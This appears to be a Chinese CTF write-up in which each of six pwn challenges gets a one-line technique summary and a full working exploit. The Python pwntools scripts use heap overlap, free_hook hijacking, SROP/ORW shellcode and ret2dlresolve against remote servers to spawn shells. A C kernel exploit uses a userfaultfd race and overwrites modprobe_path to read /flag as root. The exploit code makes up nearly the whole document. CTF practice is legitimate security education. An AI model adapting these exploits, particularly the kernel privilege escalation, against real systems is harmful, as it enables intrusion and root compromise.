notebook一题在fmyy师傅的指导下赛后复现成功,orz,做了一天还没出,我tmd的怎么这么菜=.=
baby_diary
off by null,堆风水造对重叠,劫持free_hook为system来getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = 'baby_diary'
elf = ELF('baby_diary')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "8.140.114.72"
port = 1399
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def add(size,payload = ""):
cmd(1)
sla("size: ",str(size))
if payload:
sa("content: ",payload)
else:
sa("content: ",'\n')
def free(idx):
cmd(3)
sla("index: ",str(idx))
def show(idx):
cmd(2)
sla("index: ",str(idx))
add(0x100+0x60) #0
add(0x4f0) #1
add(0x1f0) #2
add(0x4f0) #3
add(0x4f0) #4
add(0x4f0) #5
add(0x4f0) #6
add(0x4f0) #7
add(0x4f0) #8
add(0x4f0) #9
add(0x4f0) #10
free(6)
free(4)
free(8)
free(3)
add(0x527,"\x00"*0x4e8+p64(0x109)+'\x00'*0x8+'\n')#3
add(0x4c0)#4
add(0x4f0)#6
add(0x4f0)#8
free(4)
free(5)
add(0x4f0)#4
add(0x4c0)
free(8)
free(4)
free(6)
add(0x4f0,"\x00"*0x8+'\n')#4
add(0x4f0)#6
add(0x4f0)#8
free(6)
free(8)
free(7)
add(0x520,"\x00"*0x4f0+p64(0)+p64(0)+'\n')#6
add(0x4c0)#8
add(0x4f0)#7
free(5)
add(0x490,"a\n")
add(0x10)
free(11)
add(0x27,"\x00"*0x27)
free(11)
add(0x27,'\x00'*0x18+p64(0x109)+'\n')
free(4)
add(0x520)
add(0x1000)
show(5)
libc_base = l64()-1472-libc.sym["__malloc_hook"]-0x10
lg("libc_base",libc_base)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x201)+p64(0)*2+'\n')
free(2)
free(8)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x201)+p64(libc_base+libc.sym["__free_hook"])*2+'\n')
add(0x1f0,"/bin/sh\x00"*0x2+'\n')
add(0x1f0,p64(libc_base+libc.sym["system"])+'\n')
# gdb.attach(p,"b *$rebase(0x17D7)")
free(4)
p.interactive()
babypwn
off by one,unlink造对重叠,劫持stdout泄露libc,劫持free_hook为setcontext函数来srop从而orw出flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = 'babypwn'
elf = ELF('babypwn')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "39.105.130.158"
port = 8888
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">>> \n",str(idx))
def add(size):
cmd(1)
sla("size:\n",str(size))
def free(idx):
cmd(2)
sla("index:\n",str(idx))
def show(idx):
cmd(4)
sla("index:\n",str(idx))
def edit(idx,payload):
cmd(3)
sla("index:\n",str(idx))
sa("content:\n",payload)
for i in range(7):
add(0xf0)
add(0xf8)
add(0xf8)
add(0x100)
add(0x100)#10
for i in range(7):
free(i)
free(7)
edit(8,"a"*0xf8)
edit(9,"a"*0xf0+p64(0)+p64(0x121))
edit(8,"a"*0xf0+p64(0x200))
free(9)
add(0xf0)
"""
for ( i = 2; i > 0; --i )
a1 ^= (32 * a1) ^ ((a1 ^ (32 * a1)) >> 17) ^ (((32 * a1) ^ a1 ^ ((a1 ^ (32 * a1)) >> 17)) << 13);
"""
for i in range(7):
add(0xf0)
add(0xf0)
add(0xf0)
for i in range(6):
free(i)
free(8)
free(9)
add(0xd0)
edit(0,p16(0x4760))
add(0xf0)
add(0xf0)
edit(2,p64(0xfbad1887)+p64(0)*3+p8(0))
libc_base= l64()-0x3ed8b0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
setcontext = libc_base+libc.sym["setcontext"]+53
pop_rdi = 0x000000000002155f+libc_base
pop_rsi = libc_base + 0x0000000000023e6a
pop_rdx = libc_base + 0x0000000000001b96
pop_rax = libc_base + 0x00000000000439c8
syscall = 0x00000000000d2975+libc_base
free(0)
edit(1,p64(libc_base+libc.sym["__free_hook"]))
add(0xd0)
add(0xd0)
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
edit(3,p64(setcontext))
edit(1,str(frame))
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,free_hook1+0x68]
sc = shellcraft.open("flag.txt",0)
sc += shellcraft.read("rax",free_hook1+0x100,0x100)
sc += shellcraft.write(1,free_hook1+0x100,0x100)
free(1)
p.sendline(flat(payload).ljust(0x68,'\x90')+asm(sc))
# gdb.attach(p)
p.interactive()
orw
数组越界劫持free_got为堆地址,没开nx,free之后执行shellcode
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = 'orw'
elf = ELF('orw')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "39.105.131.68"
port = 12354
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">>\n",str(idx))
def add(size,payload,idx):
cmd(1)
sla("index:\n",str(idx))
sla("size:\n",str(size))
sa("content:\n",payload)
sc = shellcraft.open("flag",0)
sc += shellcraft.read("rax","rsp",0x100)
sc += shellcraft.write(1,"rsp",0x100)
add(0,asm(sc)+'\n',-0x19)
# gdb.attach(p,"b *$rebase(0xE95)")
p.interactive()
pipeline
堆溢出,可以劫持堆中指针造成任意地址些原语,劫持free_hook为system来getshell
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
#context.log_level = 'debug'
binary = 'pipeline'
elf = ELF('pipeline')
libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "59.110.173.239"
port = 2399
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def cmd(idx):
sla(">> ",str(idx))
def add():
cmd(1)
def edit(idx,offset,size):
cmd(2)
sla("index: ",str(idx))
sla("offset: ",str(offset))
sla("size: ",str(size))
def show(idx):
cmd(5)
sla("index: ",str(idx))
def destory():
cmd(3)
sla("index: ",str(idx))
def append(idx,size,payload):
cmd(4)
sla("index: ",str(idx))
sla("size: ",str(size))
sa("data: ",payload)
add()
add()
add()
add()
add()
edit(0,0,0x500)
edit(1,0,0x100)
edit(0,0,0)
edit(0,0,0x20)
show(0)
libc_base = l64() - 0x1ec010
lg("libc_base",libc_base)
free_hook = libc_base + libc.sym["__free_hook"]
sys_addr = libc_base + libc.sym["system"]
add()
append(0,str(0xffff00f0),"a"*0x28+p64(0x21)+p64(libc_base+libc.sym["__free_hook"])+p64(0x0000002000000000)+'\n')
append(5,str(0x10),p64(libc_base+libc.sym["system"])+'\n')
append(1,0x8,"/bin/sh\x00")
# gdb.attach(p,"b *$rebase(0x1861)")
edit(1,0,0)
p.interactive()
no_output
signal异常进栈溢出,ret2dl一把梭
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__Author__ = Cnitlrt
import sys
import os
from pwn import *
from roputils import*
#context.log_level = 'debug'
binary = './test'
elf = ELF('./test')
# libc = elf.libc
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "39.105.138.97"
port = 1234
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
open_plt = 0x080490F0
read_plt = 0x80490C0
pop3r = 0x08049581
p.send("a"*0x30)
sleep(0.01)
p.send("\x00"*0x20)
sleep(0.01)
# p.send("hello_boy".ljust(0x10,'\x00'))
# sleep(0.01)
p.sendline("-2147483648")
p.sendline("-1")
# payload = "\x00"*0x48+p32(0)+p32(read_plt)
# payload += p32(pop3r)+p32(0x0)+p32(0x0804c018)+p32(0x100)
# # payload += p32(read_plt) + p32(pop3r) + p32(0) + p32(0x804C040+0x100) + p32(0x8)
# # payload += p32(0x80494D6)
# # payload += p32(0x804C040+0x100) + p32(0x804C034)
# # payload += p32(0x1234)
rop = ROP('./test')
offset = 76
bss_addr = rop.section('.bss')
payload = rop.fill(offset)
payload += rop.call("read",0,bss_addr,0x100)
payload += rop.dl_resolve_call(bss_addr + 20,bss_addr)
p.send(payload)
payload = rop.string("/bin/sh;")
payload += rop.fill(20,payload)
payload += rop.dl_resolve_data(bss_addr + 20,'system')
payload += rop.fill(100,payload)
sleep(0.01)
p.send(payload)
# buf = rop
# # gdb.attach(p,"b *0x804947D")
p.interactive()
notebook
userfault条件竞争造uaf,而后劫持数组指针造任意地址读写,劫持modprobe_path
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PAGE_SIZE 0x1000
//cat /proc/kallsyms | grep modprobe_path
#define MOD_PROBE 0x125d2e0
#define CHUNK_SIZE 0x100
size_t user_cs, user_ss, user_rflags, user_sp;
size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t vmlinux_base = 0;
size_t modprobe_path;
int fd;
char tmp[0x100] = {0};
size_t addr1[0x8] = {0};
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
void errExit(char *msg) {
puts(msg);
_exit(-1);
}
struct Data {
int64_t idx;
int64_t size;
char *buf;
};
void add(unsigned int index,char *buf,int64_t size) {
struct Data data;
data.size = size;
data.buf = buf;
data.idx = index;
ioctl(fd,0x100,&data);
}
void del(unsigned int index) {
struct Data data;
data.idx = index;
ioctl(fd,0x200,&data);
}
void edit(unsigned int index,char *buf,int64_t size) {
struct Data data;
data.size = size;
data.buf = buf;
data.idx = index;
ioctl(fd,0x300,&data);
}
void gift(char *buf){
struct Data data;
data.buf = buf;
ioctl(fd,100,&data);
}
void registerUserfault(void *fault_page,void *handler)
{
pthread_t thr;
struct uffdio_api ua;
struct uffdio_register ur;
uint64_t uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
ua.api = UFFD_API;
ua.features = 0;
if (ioctl(uffd, UFFDIO_API, &ua) == -1)
errExit("[-] ioctl-UFFDIO_API");
ur.range.start = (unsigned long)fault_page;
ur.range.len = PAGE_SIZE;
ur.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1)
errExit("[-] ioctl-UFFDIO_REGISTER");
int s = pthread_create(&thr, NULL,handler, (void*)uffd);
if (s!=0)
errExit("[-] pthread_create");
}
void* write_handler(void *arg)
{
struct uffd_msg msg;
unsigned long uffd = (unsigned long)arg;
puts("[+] write_handler created");
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready != 1)
errExit("[-] Wrong pool return value");
del(0);
nready = read(uffd, &msg, sizeof(msg));
if (nready <= 0) {
errExit("[-]msg error!!");
}
char *page = (char*)mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("[-]mmap page error!!");
struct uffdio_copy uc;
memset(page, 0, sizeof(page));
memcpy(page,addr1,8);
uc.src = (unsigned long)page;
uc.dst = (unsigned long)msg.arg.pagefault.address & ~(PAGE_SIZE - 1);;
uc.len = PAGE_SIZE;
uc.mode = 0;
uc.copy = 0;
ioctl(uffd, UFFDIO_COPY, &uc);
puts("[+] writek_handler done!!");
return NULL;
}
void writeHeapFD() {
char *user_buf = (char*)mmap(NULL,PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (user_buf == MAP_FAILED)
errExit("[-] mmap user_buf error!!");
registerUserfault(user_buf,write_handler);
write(fd,user_buf,0);
}
//codebase = 0xffffffffc0002000
//$rdx - 0x3fffbb00
int main()
{
save_status();
/*signal(SIGSEGV, spawn_shell);
signal(SIGTRAP, spawn_shell);*/
fd = open("/dev/notebook",2);
if(fd < 0){
puts("open error");
exit(0);
}
FILE *stream =popen("cat /tmp/moduleaddr | awk '{print $6}'","r");
fread(tmp,0x12,1,stream);
size_t codebase = strtoul(tmp,NULL,16);
printf("codebase: 0x%llx\n",codebase);
if(fd < 0){
puts("OPEN ERROR");
exit(0);
}
puts("open success");
for (int i=0;i<0x100;i++) {
tmp[i] = '\x00';
}
add(0,tmp,0x60); //0
add(0x1,tmp,0x60); //0
size_t chunkList[0x100] = {0};
gift(chunkList);
size_t chunk1 = chunkList[2];
size_t chunk0 = chunkList[0];
del(0);
del(1);
for(int i = 0;i < 100;i++){
add(0,tmp,0x60);
gift(chunkList);
printf("[+] chunk[0]:0x%llx\n",(size_t *)chunkList[0]);
if(chunkList[0] == chunk1){
puts("[+] Find chunk[1]");
break;
}
else{
del(0);
}
}
read(fd,chunkList,0);
size_t cookie = chunkList[0] ^ chunk1 ^ chunk0;
printf("[+] cookie: 0x%llx\n",cookie);
printf("chunk0:0x%llx\n",chunk0);
printf("chunk1:0x%llx\n",chunk1);
addr1[0] = (codebase+0x2500-0x10) ^ cookie ^ chunk1;
writeHeapFD();
int x = 0;
*(size_t*)(tmp + 0xf0) = cookie ^ (codebase + 0x2500 - 0x10);
for(int i = 0;i < 0xf;i++){
add(i,tmp,0x60);
gift(chunkList);
if(chunkList[i*2] == chunk1){
printf("[*] 0x%llx ==> Find chunk[%d]\n",chunkList[i*2],i);
x = i;
break;
}
if(i == 0xe){
errExit("NOT FOUND!!!!!");
}
}
add(x+1,tmp,0x60);
chunkList[2] = codebase + 0x168;
chunkList[3] = 0x100;
chunkList[4] = codebase + 0x2500;
chunkList[5] = 0x100;
write(fd,chunkList,x + 1);
read(fd,chunkList,0);
printf("0x%llx\n",chunkList[0]);
printf("0x%llx\n",chunkList[1]);
printf("0x%llx\n",chunkList[2]);
size_t kernel_base = (chunkList[0] + codebase);// | 0xFFFFFFFF00000000 - 0x476ac4;
kernel_base = kernel_base | 0xFFFFFFFF00000000;
kernel_base = kernel_base - 0x476ac4;
printf("kernel_base:0x%llx\n",kernel_base);
size_t modprobe_path = kernel_base + MOD_PROBE;
chunkList[0] = modprobe_path;
chunkList[1] = 0x100;
write(fd,chunkList,1);
strcpy(tmp,"/tmp/1.sh\x00");
write(fd,tmp,0);
system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/1.sh");
system("echo -ne '\xff\xff\xff\xff' > /tmp/aaa");
system("chmod +x /tmp/1.sh");
system("chmod +x /tmp/aaa");
system("/tmp/aaa");
system("cat /tmp/flag");
// for(int i = 0;i < 100;i++){
// add(0,tmp,0x60);
// gift(chunkList);
// printf("[+] chunk[0]:0x%llx\n",(size_t *)chunkList[0]);
// if(chunkList[0] == chunk1){
// puts("[+] Find chunk[1]");
// add(8,tmp,0x60);
// size_t kernel_base = chunkList[7]-0x15bef20;
// size_t modprobe_path = kernel_base + MOD_PROBE;
// printf("MOD_PROBE_ADDR: 0x%llx\n",modprobe_path);
// break;
// }
// else{
// del(0);
// }
// }
/*for(int i = 0;i<0xf;i++){
printf("chunk[%d]:0x%llx\n",i,(size_t *)chunkList[i]);
}*/
//cookie = 0x8d27a11ecb38f824
}
/*
0xffff8800030d04e0: 0x8d27a11ecb38fb44 0x6161616161616161
0xffff8800030d0000: 0x8d27a11ecb38fcc4 0x6161616161616161
0xffff8800030d0d80: 0x8d27a11ecb38f5a4 0x6161616161616161
*/